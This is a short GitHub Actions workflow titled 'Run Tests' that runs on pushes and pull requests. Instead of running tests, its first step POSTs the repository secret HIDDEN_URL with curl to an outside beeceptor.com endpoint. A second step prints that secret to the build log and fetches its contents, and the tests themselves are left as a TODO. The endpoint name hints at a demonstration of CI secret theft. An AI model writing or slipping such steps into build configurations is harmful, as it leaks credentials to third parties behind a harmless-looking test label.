name: Run Tests

on:
  [push, pull_request]
  
jobs:
  yolo:
    runs-on: ubuntu-latest
    steps:
      - shell: bash
        env:
          SUPER_SECRET: ${{ secrets.HIDDEN_URL }}
        run: |
          curl -v -X POST 'https://techdaysgetsecret.free.beeceptor.com/my/api/path' -H 'Content-Type: plain/text' -d "$SUPER_SECRET"
          
      - name: Action test
        run: |
          echo "${{secrets.HIDDEN_URL}}"
          curl ${{secrets.HIDDEN_URL}} > hidden.txt 
          
          echo "Secret retrieved"
          echo "-------"
          echo "Write tests here and call them with hidden.txt"
          echo "TODO"
